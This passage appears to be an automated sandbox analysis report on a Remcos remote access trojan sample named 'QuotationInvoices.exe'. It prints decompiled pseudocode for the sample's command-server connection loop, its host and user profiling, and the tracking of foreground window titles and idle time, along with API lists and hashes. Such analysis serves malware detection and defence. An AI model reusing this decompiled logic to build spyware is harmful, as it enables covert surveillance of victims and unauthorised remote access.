Instruction Fuzzy Hash: 92219171F50300ABD60476BA8947B6E32469B90B09F50043FBD16672E7EEBD898943DF

Uniqueness

Uniqueness Score: -1.00%

Function 00416790, Relevance: 3.0, APIs: 2, Instructions: 41COMMON

Download Yara Rule

APIs

GetComputerNameExW.KERNEL32(00000001,?,?,0046B558), ref: 004167AD
GetUserNameW.ADVAPI32(?,00000014), ref: 004167C5

Memory Dump Source

Source File: 00000001.00000002.919290826.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.919336614.000000000046E000.00000040.00000001.sdmp Download File

Yara matches

Similarity

API ID: Name$ComputerUser
String ID:
API String ID: 4229901323-0
Opcode ID: 35b0557f52639ce5fe566608396f8686f3792229fbe7bb5846fc4a6189a58c2d
Instruction ID: 1838cdb0f16311125d16a71c495aab3bd66088b28ef653a022b6bbed2cc511f6
Opcode Fuzzy Hash: 35b0557f52639ce5fe566608396f8686f3792229fbe7bb5846fc4a6189a58c2d
Instruction Fuzzy Hash: 6701FB7290011DABCF04EBD4DC49ADEB77CEF44705F10016BF906B61D1EEB86A898B99

Uniqueness

Uniqueness Score: -1.00%

Function 00411225, Relevance: 28.7, APIs: 6, Strings: 10, Instructions: 728
sleepnetworkthreadCOMMON

Download Yara Rule

C-Code - Quality: 85%

			E00411225() {
				struct _SECURITY_ATTRIBUTES* _v8;
				char _v20;
				char _v32;
				char _v56;
				char _v80;
				char _v104;
				char _v128;
				char _v140;
				void* _v163;
				char _v164;
				char _v188;
				char _v212;
				char _v236;
				char _v260;
				char _v284;
				char _v308;
				char _v332;
				char _v356;
				char _v380;
				char _v404;
				char _v428;
				char _v452;
				char _v476;
				char _v500;
				char _v524;
				char _v548;
				char _v572;
				char _v596;
				char _v620;
				char _v644;
				char _v668;
				char _v692;
				char _v716;
				char _v740;
				char _v764;
				char _v788;
				char _v812;
				char _v836;
				char _v860;
				char _v884;
				char _v908;
				char _v932;
				char _v956;
				char _v980;
				char _v1004;
				char _v1028;
				char _v1052;
				char _v1076;
				char _v1100;
				char _v1124;
				char _v1148;
				char _v1172;
				char _v1196;
				char _v1220;
				char _v1244;
				char _v1268;
				char _v1292;
				char _v1316;
				char _v1340;
				char _v1364;
				char _v1388;
				char _v2388;
				signed int _t162;
				void* _t164;
				long _t168;
				void* _t170;
				signed char _t174;
				void* _t180;
				short _t191;
				void* _t193;
				void* _t194;
				void* _t196;
				long _t200;
				short _t205;
				void* _t206;
				void* _t208;
				void* _t221;
				void* _t229;
				void* _t230;
				void* _t233;
				intOrPtr* _t234;
				void* _t237;
				void* _t238;
				void* _t239;
				void* _t242;
				void* _t244;
				void* _t247;
				void* _t248;
				void* _t249;
				void* _t250;
				void* _t252;
				void* _t253;
				void* _t254;
				intOrPtr* _t345;
				void* _t359;
				void* _t361;
				void* _t363;
				void* _t365;
				void* _t367;
				long _t371;
				void* _t372;
				void* _t373;
				char* _t393;
				void* _t601;
				void* _t610;
				void* _t660;
				signed short _t664;
				struct _SECURITY_ATTRIBUTES* _t667;
				void* _t677;
				void* _t678;
				void* _t679;
				void* _t680;
				void* _t681;
				void* _t682;
				void* _t683;
				void* _t684;
				void* _t686;
				void* _t687;
				void* _t691;
				void* _t692;
				void* _t693;
				void* _t694;
				void* _t695;
				long _t697;

				_push(_t372);
				E0040201F(_t372,  &_v104);
				L004169C0( &_v236, _t601);
				E0040201F(_t372,  &_v1388);
				_t660 = 0x46b558;
				_t162 = L00435E19(_t160, L00401EF9(L00401DAD(0x46b558, _t601, _t695, 0x29)));
				if(_t162 != 0) {
					_t371 = _t162 * 0x3e8;
					_t697 = _t371;
					Sleep(_t371);
				}
				_t678 = _t677 - 0x18;
				L00401FCE(_t372, _t678, 0x4647d4);
				_t164 = L00401DAD(_t660, _t601, _t697, 0);
				_t679 = _t678 - 0x18;
				E00402036(_t372, _t679, _t601, _t697, _t164);
				E00416EC5( &_v32, _t601);
				_t680 = _t679 + 0x30;
				_t667 = 0;
				_v8 = 0;
				_t373 = 0;
				L00401DAD(_t660, _t601, _t697, 0x3a);
				_t602 = 0x45e65c;
				_t168 = L00409AF8(_t697);
				_t698 = _t168;
				if(_t168 != 0) {
					L00401DAD(_t660, 0x45e65c, _t698, 0x3a);
					_t359 = E004023D3();
					_t361 = L00401EF9(L00401DAD(_t660, 0x45e65c, _t698, 0x3a));
					L00401DAD(_t660, 0x45e65c, _t698, 0x39);
					_t363 = E004023D3();
					_t365 = L00401EF9(L00401DAD(_t660, _t602, _t698, 0x39));
					L00401DAD(_t660, _t602, _t698, 0x38);
					_t367 = E004023D3();
					L00401EF9(L00401DAD(_t660, _t602, _t698, 0x38));
					_t602 = _t367;
					L00404743(_t367, _t365, _t363, _t361, _t359);
					_t680 = _t680 + 0x10;
					_t667 = 0;
				}
				L4:
				_t681 = _t680 - 0x18;
				L00401FCE(_t373, _t681, 0x45eb34);
				_t170 = L00401DAD( &_v32, _t602, _t698, _t373);
				_t682 = _t681 - 0x18;
				E00402036(_t373, _t682, _t602, _t698, _t170);
				E00416EC5( &_v20, _t602);
				_t680 = _t682 + 0x30;
				L00401DAD( &_v20, _t602, _t698, 2);
				_t174 = L0040592C(0x45eb6c);
				asm("sbb al, al");
				 *0x46aae0 =  ~_t174 + 1;
				E0040484C(0x46b748);
				if(_t667 >= 0 || E0040213F( &_v32) > 1) {
					_t701 =  *0x46b748 - 1;
					_t393 =  &_v104;
					if( *0x46b748 != 1) {
						_push(0x45e65c);
					} else {
						_push(" (TLS)");
					}
					L004058C8(_t373, _t393);
					_t683 = _t680 - 0x18;
					_t180 = L00401DAD( &_v20, 0x45eb6c, _t701, 1);
					_t602 = L00402ECA(_t373,  &_v128, E004051FC(_t373,  &_v56, E00407160( &_v80, "Connecting to ", _t701, L00401DAD( &_v20, 0x45eb6c, _t701, 0)), _t660, _t701, 0x45eb34), _t701, _t180);
					L00402ECA(_t373, _t683, _t184, _t701,  &_v104);
					_t684 = _t683 - 0x14;
					L00401FCE(_t373, _t684, "[Info]");
					L00416673(_t373, _t660);
					_t680 = _t684 + 0x30;
					L00401F11();
					L00401F11();
					L00401F11();
					_t667 = _v8;
				}
				_t191 = 2;
				 *0x46aacc = _t191;
				_t193 = L00401EF9(L00401DAD( &_v20, _t602, _t701, 0));
				__imp__#52(_t193); // executed
				_t702 = _t193;
				if(_t193 != 0) {
					L00431B90(0x46aad0,  *((intOrPtr*)( *((intOrPtr*)(_t193 + 0xc)))),  *((short*)(_t193 + 0xa)));
					_t205 = L00435E19(_t203, L00401EF9(L00401DAD( &_v20, _t602, _t702, 1)));
					__imp__#9();
					_t680 = _t680 + 0xc - 0x10;
					 *0x46aace = _t205;
					asm("movsd");
					asm("movsd");
					asm("movsd");
					asm("movsd");
					_t206 = E004048C2(_t602, _t205); // executed
					_t703 = _t206;
					if(_t206 != 0) {
						_t686 = _t680 - 0x18;
						_t208 = L00401DAD( &_v20, _t602, _t703, 1);
						_t610 = L00402ECA(_t373,  &_v56, E004051FC(_t373,  &_v188, E00407160( &_v212, "Connected to  ", _t703, L00401DAD( &_v20, _t602, _t703, 0)), 0x46b748, _t703, 0x45eb34), _t703, _t208);
						L00402ECA(_t373, _t686, _t610, _t703,  &_v104);
						_t687 = _t686 - 0x14;
						L00401FCE(_t373, _t687, "[Info]");
						L00416673(_t373, 0x46b748);
						L00401F11();
						L00401F11();
						L00401F11();
						L00404D4A(0x46b748, 0xa, 0);
						_v164 = 0;
						asm("stosd");
						_v8 = 1;
						asm("stosd");
						asm("stosd");
						asm("stosd");
						asm("stosd");
						_t221 = L004168DE(0x46b748);
						_push(_t610);
						L00407FD6( &_v164, "%I64u", _t221);
						L00406E88(_t373,  &_v128, _t610, _t703, 0x46b390);
						E0043A49A( &_v128,  *0x4699d4,  &_v140, 0xa);
						E00402036(_t373,  &_v80, _t610, _t703, L00401DAD(0x46b558, _t610, _t703, 1));
						_t229 = E004023D3();
						_t230 = L00401EF9(0x46b540);
						_t233 = E004102F0(L00401EF9(0x46b4f8), "name",  &_v2388, 0x104, _t230, _t229);
						_t691 = _t687 + 0x60;
						if(_t233 != 0) {
							L004058C8(_t373,  &_v80,  &_v2388);
						}
						_t234 =  *0x46ad40; // 0x0
						_t664 = 0;
						_t705 = _t234;
						if(_t234 != 0) {
							_t664 =  *_t234() & 0x0000ffff;
						}
						E0040412C(_t373,  &_v56, "C:\Users\jones\Desktop\QuotationInvoices.exe");
						_t692 = _t691 - 0x18;
						_t237 = L00416D80(_t373,  &_v1364, 0x46b4e0);
						_t238 = L00416C0A(_t373,  &_v1340, _t664 & 0x0000ffff);
						_t239 = L00401DAD( &_v20, _t664 & 0x0000ffff, _t705, 0);
						_t242 = L00416C0A(_t373,  &_v1316, GetTickCount());
						_t244 = L00416C0A(_t373,  &_v1292, L00416BBA( &_v1316));
						_t247 = L00416D80(_t373,  &_v1244, L00416B80( &_v1268));
						_t248 = L00416D80(_t373,  &_v1220, 0x46b0d8);
						_t249 = L00416D80(_t373,  &_v1196,  &_v56);
						_t250 = L00416D80(_t373,  &_v1172,  &_v128);
						_t252 = L00416D80(_t373,  &_v1148, 0x46b848);
						_t253 = E0040D3AD( &_v1124);
						_t254 = L00416D80(_t373,  &_v1100, 0x46b564);
						_t602 = L00402ECA(_t373,  &_v212, L00402E54( &_v188, L00402ECA(_t373,  &_v260, L00402E54( &_v284, L00402ECA(_t373,  &_v308, L00402ECA(_t373,  &_v332, L00402ECA(_t373,  &_v356, L00402ECA(_t373,  &_v380, L00402ECA(_t373,  &_v404, E004051FC(_t373,  &_v428, L00402ECA(_t373,  &_v452, L00402E54( &_v476, L00402ECA(_t373,  &_v500, L00402E54( &_v524, L00402ECA(_t373,  &_v548, E00407116(_t373,  &_v572, L00402ECA(_t373,  &_v596, L00402E54( &_v620, L00402ECA(_t373,  &_v644, L00402E54( &_v668, L00402ECA(_t373,  &_v692, L00402E54( &_v716, L00402ECA(_t373,  &_v740, L00402E54( &_v764, L00402ECA(_t373,  &_v788, E004051FC(_t373,  &_v812, L00402ECA(_t373,  &_v836, E004051FC(_t373,  &_v860, L00402ECA(_t373,  &_v884, L00402E54( &_v908, L00402ECA(_t373,  &_v932, L00402ECA(_t373,  &_v956, L00402ECA(_t373,  &_v980, L00402E54( &_v1004, L00402ECA(_t373,  &_v1028, L00402E54( &_v1052, E0040704B( &_v1076,  &_v80, 0x46b218), _t254), _t705, 0x46b218), _t253), _t705, 0x46b218), _t705, 0x46b594), _t705, 0x46b218), _t252), _t705, 0x46b218), 0x46b218, _t705,  &_v164), _t705, 0x46b218), 0x46b218, _t705, "3.1.0 Pro"), _t705, 0x46b218), _t250), _t705, 0x46b218), _t249), _t705, 0x46b218), _t248), _t705, 0x46b218), _t247), _t705, 0x46b218), 0x46b218, _t705,  *0x4699d0 & 0x000000ff), _t705, 0x46b218), _t244), _t705, 0x46b218), _t242), _t705, 0x46b218), 0x46b218, _t705,  &_v140), _t705, 0x46b218), _t705, _t239), _t705, 0x46b218), _t705, "Remcos-I9UILL"), _t705, 0x46b218), _t238), _t705, 0x46b218), _t237), _t705, 0x46b218);
						L00402ECA(_t373, _t692, _t291, _t705,  &_v236);
						_push(0x4b);
						L0040495D(_t373, 0x46b748, _t291, _t705);
						L00401F11();
						L00401F11();
						L00401F11();
						L00401F11();
						L00401F11();
						L00401F11();
						L00401F11();
						L00401F11();
						L00401F11();
						L00401F11();
						L00401F11();
						L00401F11();
						L00401F11();
						L00401F11();
						L00401F11();
						L00401F11();
						L00401F11();
						L00401F11();
						L00401F11();
						L00401F11();
						L00401F11();
						L00401F11();
						L00401F11();
						L00401F11();
						L00401F11();
						L00401F11();
						L00401F11();
						L00401F11();
						L00401F11();
						L00401F11();
						L00401F11();
						L00401F11();
						L00401F11();
						L00401F11();
						L00401F11();
						L00401F11();
						L00401F11();
						L00401F11();
						L00401F11();
						L00401F11();
						L00401F11();
						L00401F11();
						L00401F11();
						L00401F11();
						L00401E54();
						L00401F11();
						L00401F11();
						L00401F11();
						L00401F11();
						L00401E54();
						L00404A75(0x46b748, _t291, 0x411c7c, 1);
						_t345 =  *0x46ad44; // 0x0
						if(_t345 != 0 &&  *0x46ad49 != 0) {
							_t345 =  *_t345();
							 *0x46ad49 = 0;
						}
						if( *0x46b379 != 0) {
							_t345 = L00408D1D();
						}
						L00405882(_t345);
						_t693 = _t692 - 0x18;
						L00401FCE(_t373, _t693, "Disconnected!");
						_t694 = _t693 - 0x18;
						L00401FCE(_t373, _t694, "[Info]");
						L00416673(_t373, 0x46b218);
						_t680 = _t694 + 0x30;
						if( *0x46ae9d != 0) {
							CreateThread(0, 0, E004160C8, 0, 0, 0);
						}
						L00401F11();
						L00401E54();
					}
					_t667 = _v8;
					_t660 = 0x46b558;
				}
				_t667 = _t667 - 1;
				_v8 = _t667;
				_t373 = _t373 + 1;
				_t194 = E0040213F( &_v32);
				_t711 = _t373 - _t194;
				if(_t373 >= _t194) {
					_t196 = 2;
					_t373 = 0;
					_t200 = L00435E19(_t197, L00401EF9(L00401DAD(_t660, _t602, _t711, _t196))) * 0x3e8;
					_t698 = _t200;
					Sleep(_t200); // executed
				}
				L00401DD8( &_v20, _t602);
				goto L4;
			}

0x00411231
0x00411234
0x0041123f
0x0041124a
0x0041124f
0x00411265
0x0041126d
0x0041126f
0x0041126f
0x00411276
0x00411276
0x0041127c
0x00411286
0x0041128f
0x00411294
0x0041129a
0x004112a2
0x004112a7
0x004112aa
0x004112ae
0x004112b1
0x004112b5
0x004112ba
0x004112c1
0x004112c6
0x004112c8
0x004112ce
0x004112d5
0x004112e6
0x004112f0
0x004112f7
0x00411308
0x00411312
0x00411319
0x0041132b
0x00411330
0x00411334
0x00411339
0x0041133c
0x0041133c
0x0041133e
0x0041133e
0x00411348
0x00411351
0x00411356
0x0041135c
0x00411364
0x00411369
0x00411371
0x0041137d
0x00411389
0x0041138d
0x00411392
0x00411399
0x004113ac
0x004113b3
0x004113b6
0x004113bf
0x004113b8
0x004113b8
0x004113b8
0x004113c4
0x004113c9
0x004113d7
0x00411411
0x00411415
0x0041141a
0x00411424
0x00411429
0x0041142e
0x00411434
0x0041143c
0x00411444
0x00411449
0x00411449
0x0041144e
0x00411454
0x00411461
0x00411467
0x0041146d
0x0041146f
0x00411484
0x0041149e
0x004114a5
0x004114ab
0x004114ae
0x004114bb
0x004114bc
0x004114bd
0x004114be
0x004114c6
0x004114cb
0x004114cd
0x004114d3
0x004114e1
0x00411521
0x00411525
0x0041152a
0x00411534
0x00411539
0x00411544
0x0041154f
0x0041155a
0x00411565
0x0041156a
0x0041157b
0x0041157d
0x00411580
0x00411581
0x00411582
0x00411583
0x00411584
0x00411589
0x00411597
0x004115a7
0x004115bb
0x004115d2
0x004115de
0x004115e6
0x00411609
0x0041160e
0x00411613
0x0041161f
0x0041161f
0x00411624
0x00411629
0x0041162b
0x0041162d
0x00411631
0x00411631
0x0041163c
0x00411641
0x0041165d
0x00411671
0x00411688
0x004116a5
0x004116b9
0x004116dc
0x004116ee
0x004116fe
0x0041170e
0x0041172e
0x00411741
0x00411753
0x00411961
0x00411965
0x00411970
0x00411974
0x0041197f
0x0041198a
0x00411995
0x004119a0
0x004119ab
0x004119b6
0x004119c1
0x004119cc
0x004119d7
0x004119e2
0x004119ed
0x004119f8
0x00411a03
0x00411a0e
0x00411a19
0x00411a24
0x00411a2f
0x00411a3a
0x00411a45
0x00411a50
0x00411a5b
0x00411a66
0x00411a71
0x00411a7c
0x00411a87
0x00411a92
0x00411a9d
0x00411aa8
0x00411ab3
0x00411abe
0x00411ac9
0x00411ad4
0x00411adf
0x00411aea
0x00411af5
0x00411b00
0x00411b0b
0x00411b16
0x00411b21
0x00411b2c
0x00411b37
0x00411b42
0x00411b4d
0x00411b58
0x00411b63
0x00411b6e
0x00411b79
0x00411b84
0x00411b8f
0x00411b97
0x00411ba5
0x00411baa
0x00411bb1
0x00411bbc
0x00411bbe
0x00411bbe
0x00411bcc
0x00411bd3
0x00411bd3
0x00411bd8
0x00411bdd
0x00411be7
0x00411bec
0x00411bf6
0x00411bfb
0x00411c00
0x00411c0a
0x00411c18
0x00411c18
0x00411c21
0x00411c29
0x00411c29
0x00411c2e
0x00411c31
0x00411c31
0x00411c36
0x00411c3a
0x00411c3d
0x00411c3e
0x00411c43
0x00411c45
0x00411c49
0x00411c4d
0x00411c61
0x00411c61
0x00411c69
0x00411c69
0x00411c72
0x00000000

APIs

Sleep.KERNEL32(00000000,00000029,73B743E0,0046B558,00000000), ref: 00411276

Part of subcall function 00416673: GetLocalTime.KERNEL32(00000000), ref: 0041668D

gethostbyname.WS2_32(00000000), ref: 00411467
htons.WS2_32(00000000), ref: 004114A5
Sleep.KERNELBASE(00000000,00000002), ref: 00411C69

Part of subcall function 004102F0: RegOpenKeyExA.ADVAPI32(80000001,00000000,00000000,00020019,00000000,0046B4F8), ref: 0041030C
Part of subcall function 004102F0: RegQueryValueExA.ADVAPI32(00000000,00000000,00000000,00000000,00000208,?), ref: 00410325
Part of subcall function 004102F0: RegCloseKey.ADVAPI32(00000000), ref: 00410330

GetTickCount.KERNEL32 ref: 00411697

Part of subcall function 0040495D: send.WS2_32(?,00000000,00000000,00000000), ref: 004049D0

CreateThread.KERNEL32(00000000,00000000,004160C8,00000000,00000000,00000000), ref: 00411C18

Strings

[Info], xrefs: 0041141F, 0041152F, 00411BF1
Disconnected!, xrefs: 00411BE2
C:\Users\user\Desktop\QuotationInvoices.exe, xrefs: 00411634
name, xrefs: 004115FD
Connecting to , xrefs: 004113ED
Connected to , xrefs: 004114F7
%I64u, xrefs: 00411591
Remcos-I9UILL, xrefs: 00411680
3.1.0 Pro, xrefs: 00411715
(TLS), xrefs: 004113B8

Memory Dump Source

Source File: 00000001.00000001.663167910.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000001.663464805.000000000046E000.00000040.00020000.sdmp Download File

Yara matches

Similarity

API ID: Sleep$CloseCountCreateLocalOpenQueryThreadTickTimeValuegethostbynamehtonssend
String ID: (TLS)$%I64u$3.1.0 Pro$C:\Users\user\Desktop\QuotationInvoices.exe$Connected to $Connecting to $Disconnected!$Remcos-I9UILL$[Info]$name
API String ID: 2130001850-2052079612
Opcode ID: e8c07df6544559c8e0a661bb47876adf1a67b45bcaef0af5782c8762413ad87e
Instruction ID: b961d722343d7f30db04785f3d4a35f389a57dc1a7ad426590e6ff56eabec29d
Opcode Fuzzy Hash: e8c07df6544559c8e0a661bb47876adf1a67b45bcaef0af5782c8762413ad87e
Instruction Fuzzy Hash: 0B425D31A101155ACB18F771DC66AEE7365AF90308F5000BFF50AB71E2EF785E86CA99

Uniqueness

Uniqueness Score: -1.00%

Function 004089B0, Relevance: 17.7, APIs: 6, Strings: 4, Instructions: 156
sleepCOMMON

Download Yara Rule

C-Code - Quality: 81%

			E004089B0(void* __ecx, void* __edx) {
				char _v28;
				char _v52;
				char _v56;
				void* _v60;
				char _v76;
				void* _v80;
				char _v84;
				char _v88;
				struct HWND__* _v92;
				void* __ebx;
				void* __edi;
				struct HWND__* _t33;
				int _t34;
				void* _t37;
				struct HWND__* _t40;
				int _t53;
				struct HWND__* _t73;
				void* _t113;
				signed int _t119;
				signed int _t121;

				_t107 = __edx;
				_t121 = (_t119 & 0xfffffff8) - 0x5c;
				_push(_t73);
				_push(_t115);
				_t113 = __ecx;
				while( *((char*)(_t113 + 0x48)) != 0 ||  *((char*)(_t113 + 0x49)) != 0) {
					Sleep(0x1f4); // executed
					_t33 = GetForegroundWindow(); // executed
					_t73 = _t33;
					_t34 = GetWindowTextLengthA(_t73);
					_t4 = _t34 + 1; // 0x1
					E00405107(_t73,  &_v76, _t107, _t113, _t4, 0);
					if(_t34 != 0) {
						_t53 = E004023D3();
						GetWindowTextA(_t73, L00401EF9( &_v76), _t53);
						_t107 = 0x46ccd0;
						if(L00409B04(0x46ccd0) == 0) {
							E0040416D(0x46ccd0,  &_v76);
							L00401EE8(E004023D3() - 1);
							_t130 =  *0x46b37a;
							if( *0x46b37a == 0) {
								_push(0);
								_t121 = _t121 - 0x18;
								_t107 = E00407160( &_v52, "\r\n[ ", __eflags,  &_v84);
								E004051FC(_t73, _t121, _t63, _t113, __eflags, " ]\r\n");
								E00408554(_t113);
								L00401F11();
							} else {
								_t121 = _t121 - 0x18;
								E00402036(_t73, _t121, 0x46ccd0, _t130,  &_v84);
								L00408DFF(_t73, _t113, _t130);
							}
						}
					}
					_t79 = _t113;
					L0040993C(_t113);
					_t37 = L00416BBA(_t113);
					_t115 = 0xea60;
					if(_t37 < 0xea60) {
						L18:
						L00401F11();
						continue;
					} else {
						_t73 = _v92;
						while( *((char*)(_t113 + 0x48)) != 0 ||  *((char*)(_t113 + 0x49)) != 0) {
							_t40 = L00416BBA(_t79);
							if(_t40 < _t115) {
								__eflags = _t73 % _t115;
								E0043A49A(_t79, _t73 / _t115,  &_v88, 0xa);
								_push(0);
								_t121 = _t121 + 0xc - 0x18;
								_t115 = _t121;
								_t107 = E0040713C(_t73,  &_v56, "\r\n{ User has been idle for ", _t113, __eflags, L00401FCE(_t73,  &_v28,  &_v88));
								E004051FC(_t73, _t121, _t47, _t113, __eflags, " minutes }\r\n");
								E00408554(_t113);
								L00401F11();
								L00401F11();
								goto L18;
							}
							_t73 = _t40;
							_v92 = _t73;
							Sleep(0x3e8);
						}
						L00401F11();
						break;
					}
				}
				__eflags = 0;
				return 0;
			}

0x004089b0
0x004089b6
0x004089b9
0x004089ba
0x004089bc
0x004089be
0x00408a1d
0x00408a23
0x00408a29
0x00408a2c
0x00408a36
0x00408a3e
0x00408a45
0x00408a4f
0x00408a60
0x00408a66
0x00408a76
0x00408a82
0x00408a96
0x00408a9b
0x00408aa6
0x00408abc
0x00408abe
0x00408ad8
0x00408adc
0x00408ae4
0x00408aed
0x00408aa8
0x00408aa8
0x00408aae
0x00408ab5
0x00408ab5
0x00408aa6
0x00408a76
0x00408af2
0x00408af4
0x00408af9
0x00408afe
0x00408b05
0x00408b9e
0x00408ba2
0x00000000
0x00408b0b
0x00408b0b
0x00408b0f
0x00408b1f
0x00408b26
0x00408b46
0x00408b49
0x00408b59
0x00408b5b
0x00408b5e
0x00408b7b
0x00408b7f
0x00408b87
0x00408b90
0x00408b99
0x00000000
0x00408b99
0x00408b28
0x00408b2f
0x00408b33
0x00408b33
0x00408bb0
0x00000000
0x00408bb0
0x00408b05
0x00408bb7
0x00408bbd

APIs

__Init_thread_footer.LIBCMT ref: 00408A12
Sleep.KERNELBASE(000001F4), ref: 00408A1D
GetForegroundWindow.USER32 ref: 00408A23
GetWindowTextLengthA.USER32(00000000), ref: 00408A2C
GetWindowTextA.USER32 ref: 00408A60
Sleep.KERNEL32(000003E8,00000000,-00000001,?), ref: 00408B33

Part of subcall function 00408554: SetEvent.KERNEL32(?,?,?,?,004099EE), ref: 00408581

Strings

], xrefs: 00408ACC
[ , xrefs: 00408AC7
minutes }, xrefs: 00408B60
{ User has been idle for , xrefs: 00408B6C

Memory Dump Source

Source File: 00000001.00000001.663167910.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000001.663464805.000000000046E000.00000040.00020000.sdmp Download File

Yara matches

Similarity

API ID: Window$SleepText$EventForegroundInit_thread_footerLength
String ID: [ ${ User has been idle for $ ]$ minutes }
API String ID: 911427763-3343415809
Opcode ID: 9ee80d5217fc48de27d1a4327444468f7807e72844abbfd8ab96d9f40eddcda4
Instruction ID: a3461a4b0cbaa7410ceb51a01b229af60808e71177a512760c921b0db0ee55a6
Opcode Fuzzy Hash: 9ee80d5217fc48de27d1a4327444468f7807e72844abbfd8ab96d9f40eddcda4
Instruction Fuzzy Hash: 2151C0716042005BC214F735D986A6E7795AB84318F40053FF985A62E3EF7CAA45C69F

Uniqueness

Uniqueness Score: -1.00%

Function 004179DE, Relevance: 15.9, APIs: 1, Strings: 8, Instructions: 134
COMMON

Download Yara Rule

C-Code - Quality: 84%

			E004179DE(void* __ecx, void* __edx, intOrPtr _a4) {
				char _v524;
				char _v544;
				char _v560;
				char _v572;
				void* _v576;
				char _v580;
				char _v584;
				char _v600;
				char _v608;
				char _v616;
				char _v620;
				void* _v624;
				char _v628;
				char _v632;
				char _v636;
				char _v644;
				void* _v648;
				char _v652;
				void* _v672;
				void* __ebx;
				signed int _t36;
				void* _t39;
				void* _t40;
				void* _t77;

				_t73 = __edx;
				_t77 = __ecx;
				_t54 = __edx;
				L00401ED1(__edx,  &_v644);
				_t36 = __edx + 0xffffffd0;
				_t85 = _t36 - 7;
				if(_t36 <= 7) {
					switch( *((intOrPtr*)(_t36 * 4 +  &M00417BBA))) {
						case 0:
							_push(L"Temp");
							goto L14;
						case 1:
							__ecx =  &_v620;
							__eax = L00416738(__ebx,  &_v620);
							__ecx =  &_v644;
							__eax = L00401E5E( &_v644, __edx, __esi, __eax);
							goto L4;
						case 2:
							_push(L"SystemDrive");
							goto L14;
						case 3:
							_push(L"WinDir");
							goto L14;
						case 4:
							__eax = L00416F93(__ecx);
							__eflags = __al;
							if(__eflags != 0) {
								__ecx =  &_v620;
								E0040412C(__ebx, __ecx, L"\\SysWOW64") = L00438F0F(__ebx, __ecx, __eflags, L"WinDir");
								__ecx =  &_v600;
								__edx = __eax;
								__ecx =  &_v580;
								__eax = L00402F24( &_v580, __edx, __eax);
								__ecx =  &_v652;
								__eax = L00401E5E( &_v652, __edx, __esi, __eax);
								__ecx =  &_v584;
								__eax = L00401E54();
								__ecx =  &_v608;
								__eax = L00401E54();
								L4:
								__ecx =  &_v620;
								goto L5;
							} else {
								__ecx =  &_v572;
								E0040412C(__ebx, __ecx, L"\\system32") = L00438F0F(__ebx, __ecx, __eflags, L"WinDir");
								__ecx =  &_v600;
								__edx = __eax;
								__ecx =  &_v628;
								__eax = L00402F24( &_v628, __edx, __eax);
								__ecx =  &_v652;
								__eax = L00401E5E( &_v652, __edx, __esi, __eax);
								__ecx =  &_v632;
								__eax = L00401E54();
								__ecx =  &_v608;
								__eax = L00401E54();
								__ecx =  &_v584;
								L5:
								__eax = L00401E54();
								goto L15;
							}
							L16:
						case 5:
							_push(L"ProgramFiles");
							goto L14;
						case 6:
							_push(L"AppData");
							goto L14;
						case 7:
							_push(L"UserProfile"); // executed
							L14:
							_t51 = L00438F0F(_t54, _t57, _t85); // executed
							L0040B611(_t54,  &_v644, _t51);
							goto L15;
					}
				}
				L15:
				__imp__GetLongPathNameW(L00401E4F( &_v644),  &_v524, 0x208); // executed
				_t39 = E0040412C(_t54,  &_v560, _a4);
				_t40 = E0040412C(_t54,  &_v636, "\\");
				L00402F24(_t77, L00402F24( &_v600, L00417CFB(_t54,  &_v616, _t73, _t85,  &_v544, _t38), _t40), _t39);
				L00401E54();
				L00401E54();
				L00401E54();
				L00401E54();
				L00401E54();
				return _t77;
				goto L16;
			}

0x004179de
0x004179ed
0x004179ef
0x004179f5
0x004179fd
0x00417a00
0x00417a03
0x00417a09
0x00000000
0x00417a10
0x00000000
0x00000000
0x00417a1a
0x00417a1e
0x00417a24
0x00417a28
0x00000000
0x00000000
0x00417a3b
0x00000000
0x00000000
0x00417a45
0x00000000
0x00000000
0x00417a4f
0x00417a54
0x00417a56
0x00417aaf
0x00417abe
0x00417ac5
0x00417ace
0x00417ad0
0x00417ad4
0x00417adb
0x00417adf
0x00417ae4
0x00417ae8
0x00417aed
0x00417af1
0x00417a2d
0x00417a2d
0x00000000
0x00417a58
0x00417a5d
0x00417a6c
0x00417a73
0x00417a7c
0x00417a7e
0x00417a82
0x00417a89
0x00417a8d
0x00417a92
0x00417a96
0x00417a9b
0x00417a9f
0x00417aa4
0x00417a31
0x00417a31
0x00000000
0x00417a31
0x00000000
0x00000000
0x00417afb
0x00000000
0x00000000
0x00417b02
0x00000000
0x00000000
0x00417b09
0x00417b0e
0x00417b0e
0x00417b19
0x00000000
0x00000000
0x00417a09
0x00417b1e
0x00417b35
0x00417b44
0x00417b53
0x00417b7b
0x00417b85
0x00417b8e
0x00417b97
0x00417ba0
0x00417ba9
0x00417bb6
0x00000000

APIs

GetLongPathNameW.KERNELBASE(00000000,?,00000208), ref: 00417B35

Strings

\system32, xrefs: 00417A58
AppData, xrefs: 00417B02
WinDir, xrefs: 00417A45, 00417A67, 00417AB9
Temp, xrefs: 00417A10
\SysWOW64, xrefs: 00417AAA
ProgramFiles, xrefs: 00417AFB
SystemDrive, xrefs: 00417A3B
UserProfile, xrefs: 00417B09

Memory Dump Source

Source File: 00000001.00000001.663167910.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000001.663464805.000000000046E000.00000040.00020000.sdmp Download File

Yara matches

Similarity

API ID: LongNamePath
String ID: AppData$ProgramFiles$SystemDrive$Temp$UserProfile$WinDir$\SysWOW64$\system32
API String ID: 82841172-1609423294
Opcode ID: 0a7c1c5d57b5b540b7c84ae64b3e6726f683c0a197a39e915024fc2b6aa622c6
Instruction ID: afae0211571067ee381468669c1ecc2898b491f4c02966a4346bae8a75c34f33
Opcode Fuzzy Hash: 0a7c1c5d57b5b540b7c84ae64b3e6726f683c0a197a39e915024fc2b6aa622c6
Instruction Fuzzy Hash: 444141711082005AC308FB61D9569EFB3A4DE95749F10053FF553A20E2EF78AE8DC69A

Uniqueness

Uniqueness Score: -1.00%

Function 0040864B, Relevance: 9.2, APIs: 6, Instructions: 156
sleepCOMMON

Download Yara Rule

C-Code - Quality: 98%

			E0040864B(void* __ecx, char* __edx) {
				char _v1028;
				char _v1032;
				char _v1052;
				void* _v1068;
				char _v1080;
				char _v1092;
				void* _v1096;
				char _v1100;
				char _v1124;
				char _v1128;
				char _v1136;
				void* _v1144;
				void* __ebx;
				void* __esi;
				void* __ebp;
